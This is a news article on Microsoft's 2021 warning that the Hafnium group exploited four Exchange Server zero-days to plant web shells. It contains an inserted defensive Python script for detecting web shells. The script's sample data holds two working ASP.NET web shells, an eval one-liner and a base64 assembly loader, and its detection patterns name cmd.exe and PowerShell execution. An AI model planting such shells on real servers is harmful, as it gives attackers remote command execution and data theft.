UPDATED 21:34 EDT / MARCH 02 2021

SECURITY

Microsoft warns that Chinese hackers are targeting vulnerabilities in Exchange Server

Microsoft Corp. issued a warning today that a new Chinese state-sponsored hacking group is targeting on-premises versions of Microsoft Exchange Server using a number of recently identified and now patched vulnerabilities.

The hacking group, dubbed “Hafnium” by the Microsoft Threat Intelligence Center, is described as “highly skilled and sophisticated.” It’s specifically attempting to steal information from U.S. targets, including universities, defense contractors, law firms and infectious-disease researchers.

Exploitation of the vulnerabilities in the wild was first detected by researchers at cybersecurity firm Volexity Inc. in early January. All four were zero-days, flaws unknown to the vendor at the time they were being exploited: a server-side request forgery (SSRF) vulnerability, CVE-2021-26855, that lets an unauthenticated attacker send arbitrary HTTP requests and authenticate as the Exchange server itself; an insecure deserialization vulnerability in the Unified Messaging service, CVE-2021-26857, that gives code execution as SYSTEM on the server; and two post-authentication arbitrary file write vulnerabilities, CVE-2021-26858 and CVE-2021-27065, that let an attacker who has authenticated, for instance through the SSRF bug, write a file to any path on the server.

Hafnium chained the vulnerabilities to gain access to targeted Exchange servers without valid credentials, using the SSRF flaw to pass as the server itself and the file write flaws to drop a web shell, a server-side script that accepts commands over ordinary HTTP requests, onto the server. The group then used that web shell to control the compromised server remotely and to steal data from the organization’s network.

While Microsoft has released a patch for the vulnerabilities, the concern is that Exchange users will not promptly install the updates. “Even though we’ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,” Tom Burt, corporate vice president, customer security and trust at Microsoft, wrote in a blog post. “Promptly applying today’s patches is the best protection against this attack.” Patching closes the entry point but does not remove a web shell that was already written to a server before the update was applied, so servers that were exposed to the internet before patching also need to be checked for signs of compromise.
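One such check, added here as an illustration and not code from Microsoft, Volexity or the article: a small triage script that walks a copy of an Exchange server’s web-served directories and flags ASP.NET pages that both read attacker-controlled request input and hand it to an execution primitive (eval, process creation, in-memory assembly loading), which is the shape every web shell of the kind described above takes. The default directory roots, the static-only rule for aspnet_client, and the three sample pages are assumptions constructed for the example; the patterns are generic and will need tuning against your own baseline.

```python
"""Triage a copy of an Exchange server's web-served directories for ASP.NET web shells."""
from __future__ import annotations

import hashlib
import os
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Directories under the IIS / Exchange install that serve content to the internet. These
# defaults are assumptions for this example (not from the article); on a live host, pass
# the roots you actually serve, or point the scan at an offline copy of them.
DEFAULT_ROOTS = [
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
]
SERVER_SCRIPT_EXT = {".aspx", ".asmx", ".ashx", ".asax"}

# A web shell needs two halves: attacker-controlled input and a way to turn it into code
# or a process. Only files with both are flagged, so legitimate pages that merely read
# Request values (every logon form does) are not reported.
INPUT_PATTERNS = [
    r"Request\s*\.\s*(Form|QueryString|Headers|Cookies|Item|Params)\b",
    r"Request\s*\[",
]
EXEC_PATTERNS = [
    r"\beval\s*\(",                                                      # JScript eval(Request..., "unsafe")
    r"\bProcess\s*\.\s*Start\b|\bnew\s+Process\s*\(|ProcessStartInfo",  # spawn cmd.exe / powershell
    r"\bcmd\.exe\b|\bpowershell(\.exe)?\b",
    r"Assembly\s*\.\s*Load\b",                                           # load attacker-supplied .NET bytes
    r"Convert\s*\.\s*FromBase64String",                                  # decoder stage that usually precedes it
]
# Assumption: this directory tree holds only static client-side files, so any server
# script inside it is out of place regardless of what it contains.
STATIC_ONLY_DIRS = {"aspnet_client"}


def classify(path: Path) -> list[str]:
    """Return the reasons a file looks like a web shell; an empty list means none found."""
    reasons = []
    if any(part.lower() in STATIC_ONLY_DIRS for part in path.parts):
        reasons.append("server-side script in a static-only directory")
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return reasons
    execs = [p for p in EXEC_PATTERNS if re.search(p, text)]
    if execs and any(re.search(p, text) for p in INPUT_PATTERNS):
        reasons.append(f"request input reaches an execution primitive ({execs[0]})")
    if execs and len(text) < 512:
        reasons.append("execution primitive in a tiny page (one-liner shell)")
    return reasons


def scan_tree(root: str | os.PathLike, extensions=SERVER_SCRIPT_EXT) -> list[dict]:
    """Walk root and return one finding per suspicious server script, with hash and mtime."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            if p.suffix.lower() not in extensions:
                continue
            reasons = classify(p)
            if not reasons:
                continue
            st = p.stat()
            findings.append({
                "path": str(p),
                "sha256": hashlib.sha256(p.read_bytes()).hexdigest(),
                "mtime": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
                "reasons": reasons,
            })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree() -> str:
    """Constructed sample for this example: one benign page and two shells, in a temp dir."""
    root = tempfile.mkdtemp(prefix="exchange-copy-")
    files = {
        # Benign: reads a form field but only renders it (no execution half).
        "owa/auth/logon.aspx": (
            '<%@ Page Language="C#" AutoEventWireup="true" %>\n'
            '<script runat="server">\n'
            "  protected void Page_Load(object sender, EventArgs e) {\n"
            '    string user = Request.Form["username"];\n'
            '    lblUser.Text = Server.HtmlEncode(user ?? "");\n'
            "  }\n</script>\n"
            '<html><body><form runat="server"><asp:Label id="lblUser" runat="server" /></form></body></html>\n'
        ),
        # One-line JScript shell: a request parameter is handed straight to eval.
        "owa/auth/errorPage.aspx": (
            '<%@ Page Language="JScript"%><%eval(Request.Item["cmd"],"unsafe");%>\n'
        ),
        # Loader shell in a static-only directory: base64 from the request becomes a .NET assembly.
        "aspnet_client/system_web/webresource.aspx": (
            '<%@ Page Language="C#" %>\n'
            '<% var b = Convert.FromBase64String(Request["d"]);\n'
            '   System.Reflection.Assembly.Load(b).GetType("X").GetMethod("Run").Invoke(null, null); %>\n'
        ),
    }
    for rel, body in files.items():
        p = Path(root, *rel.split("/"))
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body, encoding="utf-8")
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f["path"], f["sha256"][:12], f["mtime"], "; ".join(f["reasons"]))
```

Run it against the sample tree and only the two shells are reported, each with a SHA-256 you can match against threat intelligence and an mtime that tells you when the file appeared; the logon page, which reads request input but never executes it, stays quiet. On a real host, anything flagged should be treated as a compromise that patching alone did not undo.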

Satnam Narang, staff research engineer at cybersecurity company Tenable Inc., told SiliconANGLE that the fact that Microsoft chose to patch these flaws early rather than include them as part of next week’s Patch Tuesday release indicates the flaws are quite severe.

“While Microsoft says that Hafnium primarily targets entities within the United States, other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions,” Narang said. “We expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately.”
